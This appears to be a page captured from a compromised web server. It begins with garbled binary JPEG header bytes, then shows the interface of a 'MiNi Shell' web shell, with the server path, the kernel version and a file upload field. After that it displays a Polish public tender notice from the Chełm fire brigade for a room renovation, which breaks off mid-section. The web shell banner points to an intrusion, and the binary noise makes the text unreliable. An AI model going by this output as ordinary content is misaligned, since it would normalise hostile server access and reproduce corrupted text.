JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230822/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230822/0036177101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont pomieszczeń SKKM i powiązanych funkcjonalnie pomieszczeń socjalnych wraz z ciągami komunikacyjnymi w budynku JRG 1 KM PSP <br/>w Chełmie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Miejska Państwowej Straży Pożarnej w Chełmie</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">KM PSP w Chełmie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 110200225</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Prymasa Stefana Wyszyńskiego 2B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chełm</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">82 565 34 28</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">82 565 55 50</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">km_chelm@straz.lublin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.strazchelm.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont pomieszczeń SKKM i powiązanych funkcjonalnie pomieszczeń socjalnych wraz z ciągami komunikacyjnymi w budynku JRG 1 KM PSP <br/>w Chełmie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6bd199b1-40c4-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00361771</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00032740/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Remont pomieszczeń SKKM i powiązanych funkcjonalnie pomieszczeń socjalnych wraz z ciągami komunikacyjnymi w budynku JRG 1 KM PSP w Chełmie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://przetargi.lubelskie.straz.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://przetargi.lubelskie.straz.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający zgodnie z art. 67 ustawy PZP określa następujące wymagania techniczne<br/> i organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej <br/> przy wykorzystaniu Platformy Zamówień Publicznych t.j.:<br/>6.1. stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 KB/s;<br/>6.2. komputer klasy PC lub MAC o następującej konfiguracji: pamięć min 2 GB Ram procesor<br/> Intel IV 2GHz, jeden z systemów operacyjnych – MS Windows 10, Mac Os x 10,4, Linux<br/> lub ich nowsze wersje;<br/>6.3. zainstalowana dowolna przeglądarka internetowa najlepiej najnowszej dostępnej wersji<br/> obsługująca TLS 1.2 z wyjątkiem Internet Explorer;<br/>6.4. włączona obsługa JavaScript;<br/>6.5. zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf;<br/>6.6. podłączony lub wbudowany do komputera czytnik karty kryptograficznej wydanej przez<br/> wystawcę certyfikatu używanego przez Wykonawcę.<br/>7. Zamawiający, zgodnie z § 11 ust.2 rozporządzenia Rady Ministrów z dnia 30 grudnia<br/> 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/> technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej<br/> w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz.<br/> 2452) podaje następujące informacje na temat specyfikacji połączenia, formatu<br/> przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru<br/> danych:<br/>7.1. dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB <br/> w formatach: .doc, .pdf, .zip, .docx, .xlsx, .rar, .7zip, .jpg, .jpeg, .png, .txt, .xades, .sig,<br/>7.2. informacje na temat kodowania i czasu odbioru danych ; - plik załączony przez<br/> Wykonawcę na Platformie Zamówień Publicznych ZETOPZP i zapisany, widoczny jest <br/> w systemie jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku<br/> dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu<br/> składania ofert; <br/>8. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas<br/> (hh:mm:ss) generowany wg czasu platformy Microsoft Azure, który jest<br/> zsynchronizowany ze znacznikiem czasu UTC. Wykonawca powinien dokładnie<br/> zapoznać się z niniejszą SWZ i złożyć ofertę zgodnie z jej wymaganiami.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający dopuszcza dołączenie katalogu elektronicznego do oferty</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">godnie z art. 13 ust. 1 i 2, art. 14 ust. 1 i 2 ogólnego Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO), informuję, że:<br/><br/>1. Administratorem przetwarzającym Pani/Pana dane osobowe jest: Komendant Miejski<br/>Państwowej Straży Pożarnej w Chełmie (22-100 Chełm, ul. Prymasa Stefana<br/>Wyszyńskiego 2b, tel. 82 5653428, fax. 82 5655550, e-mail: km_chelm@straz.lublin.pl).<br/><br/>2. W Komendzie Miejskiej Państwowej Straży Pożarnej w Chełmie wyznaczony został<br/>Inspektor Ochrony Danych: (20-012 Lublin, ul. Szczerbowskiego 6 C, tel. 81 53 51 237,<br/>e-mail: iod@kwpsp.lublin.pl).<br/><br/>3. Pani/Pana dane osobowe są przetwarzane na podstawie na podstawie art. 6 ust 1 lit c,<br/>d i e RODO –w związku z obsługą zgłoszenia alarmowego o zdarzeniu oraz<br/>prowadzenia działań ratowniczych w celu ochrony życia, zdrowia, mienia lub<br/>środowiska przed pożarem, klęską żywiołową lub innym miejscowym zagrożeniem.<br/><br/>4. Administrator przetwarza dane osobowe osoby zgłaszającej, osób poszkodowanych,<br/>właścicieli lub zarządców obiektów, wobec których prowadzone są działania jednostek<br/>ochrony przeciwpożarowej.<br/><br/>5. Odbiorcami danych są jednostki organizacyjne PSP oraz inne organy na mocy<br/>przepisów odrębnych ustaw.<br/><br/>6. Dane osobowe podlegają przeglądowi, nie rzadziej niż co 5 lat od dnia ich uzyskania,<br/>a także są przechowywane wyłącznie przez okres niezbędny do realizacji zadań<br/>wynikających z ustawy.<br/><br/>7. Przysługuje Pani/Panu prawo do:<br/>1) żądania od administratora dostępu do treści swoich danych, ich sprostowania,<br/>usunięcia po upływie okresu przechowywania zgodnym z właściwymi przepisami<br/>archiwalnymi lub ograniczenia przetwarzania, wniesienia sprzeciwu wobec<br/>przetwarzania;<br/>2) wniesienia skargi do organu nadzorczego, którym jest Urząd Ochrony Danych<br/>Osobowych (00-193 Warszawa, ul. Stawki 2, tel. 22 531 03 00, fax. 22 531 03 01,<br/>e-mail: kancelaria@giodo.gov.pl) jeżeli uzna Pani/Pan, że przetwarzanie narusza<br/>przepisy RODO.<br/><br/>8. Pani/Pana dane osobowe nie będą przekazywane do państwa trzeciego lub organizacji<br/>międzynarodowej.<br/><br/>9. Podanie danych osobowych jest wymogiem ustawowym i jest obowiązkowe.<br/>Przetwarzanie podanych przez Panią/Pana danych osobowych nie będzie podlegało<br/>zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu, o którym mowa<br/>w art. 22 ust. 1 i 4 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ML.2370.8.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiot zamówienia obejmuje wykonanie trzech projektów wizualizacji planowanych prac wykończeniowych z propozycją materiałową do wstępnej akceptacji, projekt instalacji elektrycznej oraz projekt techniczny, po zatwierdzeniu propozycji ujętej w wizualizacji usługa obejmie: rozbiórkę istniejących okładzin ściennych, sufitowych i podłogowych w pomieszczeniach sali operacyjnej SKKM, podgrzewalni posiłków, holu, klatki schodowej i łazienki (na parterze) usunięcie istniejących instalacji hydraulicznych, elektrycznych i teletechnicznych, położenie nowych instalacji wod-kan, tras kablowych i instalacji alarmowych, montaż sufitów, podwieszonych, wyrównanie podłoża, ułożenie kamienia naturalnego na stopniach i podstopnicach klatki schodowej. W ramach realizacji remontu zostaną ukryte piony i odejścia instalacji c.o. i c.w.u. w sali operacyjnej SKKM oraz podgrzewalni posiłków. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-10-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W toku badania i oceny ofert Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści złożonych ofert, dokona wezwania do uzupełnienia oświadczeń lub dokumentów, poprawi oczywiste omyłki pisarskie, rachunkowe z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek oraz inne omyłki polegające na niezgodności oferty z SWZ, niepowodujące istotnych zmian w treści oferty. W przypadku dokonania przez Zamawiającego poprawek w ofercie na zasadach określonych wyżej, Zamawiający niezwłocznie zawiadamia o tym, Wykonawcę, którego oferta została poprawiona.<br/>Cena jednostkowa zawiera wszystkie koszty związane z realizacją zamówienia i będzie podana w PLN z dokładnością do dwóch miejsc po przecinku<br/>Do obliczenia ceny oferty należy obliczyć wartość brutto poszczególnych pozycji zamówienia poprzez przemnożenie ilości i ceny jednostkowej netto i brutto a następnie zsumować wszystkie pozycje i otrzymaną wartość podać jako cenę oferty w formularzu ofertowym. Tak obliczona cena oferty będzie podstawiona do wzoru podanego w kryterium oceny ofert. Podać zastosowaną stawkę VAT. Prawidłowe ustalenie podatku VAT należy do obowiązków wykonawcy, zgodnie z przepisami ustawy o podatku od towarów i usług oraz podatku akcyzowym. <br/>Zastosowanie przez wykonawcę stawki podatku VAT niezgodnej z obowiązującymi przepisami, zamawiający potraktuje jako błąd w obliczeniu ceny nie podlegającej korekcie, co spowoduje odrzucenie oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>a)	w okresie ostatnich 5 lat, a jeśli okres prowadzenia działalności jest krótszy to <br/>w okresie dotychczasowej działalności, wykonali co najmniej 2 usługi remontowe polegające na remoncie obiektu budowlanego w zakresie objętym niniejszą specyfikacją (t.j. roboty remontowe obiektów straży pożarnej, wymiana instalacji elektrycznych i instalacji teletechnicznych, aranżacja wnętrza ww. obiektów)<br/>o wartości netto minimum 200.000,00 zł każda, potwierdzone, że zostały one wykonane należycie (dla wykonawców zagranicznych wartość podana w innej niż PLN walucie obcej zostanie przeliczona według średniego kursu Narodowego Banku Polskiego obowiązującego na dzień sporządzenia oferty – Tabela A NBP: kursy średnie walut obcych),<br/>b)	zapewnią do realizacji przedmiotowego zamówienia odpowiedni potencjał techniczny potwierdzony wykazem niezbędnego sprzętu i urządzeń zapewniających realizację zamówienia, <br/>c)	skierują do wykonania zamówienia następujących specjalistów:<br/>	1 osobę z uprawnieniami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej,<br/>	1 osobę z uprawnieniami budowlanymi bez ograniczeń w zakresie instalacji elektrycznych,<br/>d)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tzn.,<br/>	potwierdzi wysokość posiadanych środków finansowych lub zdolność kredytową w kwocie co najmniej 300.000,00 zł (dla wykonawców zagranicznych wartość podana w innej niż PLN walucie obcej zostanie przeliczona według średniego kursu Narodowego Banku Polskiego obowiązującego na dzień sporządzenia oferty – Tabela A NBP: kursy średnie walut obcych) w okresie nie wcześniejszym niż jeden miesiąc przed upływem terminu składania ofert,<br/>albo;<br/>	posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie niższą niż 300.000,00 zł. / dla wykonawców zagranicznych wartość podana w innej niż PLN walucie obcej zostanie przeliczona według średniego kursu Narodowego Banku Polskiego obowiązującego na dzień sporządzenia oferty – Tabela A NBP: kursy średnie walut obcych/<br/>3.	Jeżeli Wykonawca nie może wykazać, że spełnia warunki udziału w postępowaniu, <br/>o których mowa powyżej w ust. 2 pkt. a-d, Zamawiający uzna, że Wykonawca spełnia owe warunki, gdy wykaże, że polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go <br/>z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który <br/>w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku.<br/>4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że warunki udziału w postępowaniu określone przez Zamawiającego spełniają łącznie, <br/>z tym, że żaden z Wykonawców nie może podlegać wykluczeniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>a)	w okresie ostatnich 5 lat, a jeśli okres prowadzenia działalności jest krótszy to <br/>w okresie dotychczasowej działalności, wykonali co najmniej 2 usługi remontowe polegające na remoncie obiektu budowlanego w zakresie objętym niniejszą specyfikacją (t.j. roboty remontowe obiektów straży pożarnej, wymiana instalacji elektrycznych i instalacji teletechnicznych, aranżacja wnętrza ww. obiektów)<br/>o wartości netto minimum 200.000,00 zł każda, potwierdzone, że zostały one wykonane należycie (dla wykonawców zagranicznych wartość podana w innej niż PLN walucie obcej zostanie przeliczona według średniego kursu Narodowego Banku Polskiego obowiązującego na dzień sporządzenia oferty – Tabela A NBP: kursy średnie walut obcych),<br/>b)	zapewnią do realizacji przedmiotowego zamówienia odpowiedni potencjał techniczny potwierdzony wykazem niezbędnego sprzętu i urządzeń zapewniających realizację zamówienia, <br/>c)	skierują do wykonania zamówienia następujących specjalistów:<br/>	1 osobę z uprawnieniami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej,<br/>	1 osobę z uprawnieniami budowlanymi bez ograniczeń w zakresie instalacji elektrycznych,<br/>d)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tzn.,<br/>	potwierdzi wysokość posiadanych środków finansowych lub zdolność kredytową w kwocie co najmniej 300.000,00 zł (dla wykonawców zagranicznych wartość podana w innej niż PLN walucie obcej zostanie przeliczona według średniego kursu Narodowego Banku Polskiego obowiązującego na dzień sporządzenia oferty – Tabela A NBP: kursy średnie walut obcych) w okresie nie wcześniejszym niż jeden miesiąc przed upływem terminu składania ofert,<br/>albo;<br/>	posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie niższą niż 300.000,00 zł. / dla wykonawców zagranicznych wartość podana w innej niż PLN walucie obcej zostanie przeliczona według średniego kursu Narodowego Banku Polskiego obowiązującego na dzień sporządzenia oferty – Tabela A NBP: kursy średnie walut obcych/<br/>3.	Jeżeli Wykonawca nie może wykazać, że spełnia warunki udziału w postępowaniu, <br/>o których mowa powyżej w ust. 2 pkt. a-d, Zamawiający uzna, że Wykonawca spełnia owe warunki, gdy wykaże, że polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go <br/>z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który <br/>w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku.<br/>4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że warunki udziału w postępowaniu określone przez Zamawiającego spełniają łącznie, <br/>z tym, że żaden z Wykonawców nie może podlegać wykluczeniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.	O udzielenie zamówienia mogą ubiegać się 